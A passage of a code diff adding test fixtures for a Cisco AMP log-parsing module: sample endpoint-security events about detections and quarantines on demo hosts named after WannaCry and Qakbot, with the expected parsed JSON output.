command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json new file mode 100644 index 00000000000..3e3f7423594 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json @@ -0,0 +1,2853 @@ +[ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835279", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 459000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 1186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204901661835278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 443000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2465, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3738, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204897366867979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 6000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5108, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867971", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 6470, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117251", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 7590, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 8772, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462918168117000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a97fb86da4e010974860e5024137b56b", + "file.hash.sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9881, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "a97fb86da4e010974860e5024137b56b", + "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Gen.20fu.1201", + "cisco.amp.detection_id": "6411456342573187074", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 589000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11257, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411456342573187073", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 558000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "AySxs.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 12514, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:42.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 692000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1492784107692000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T12:27:42.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13751, + "process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 268148295, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458626002840536600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 15508, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 161000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583861114428195000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 16640, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 27000000, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + 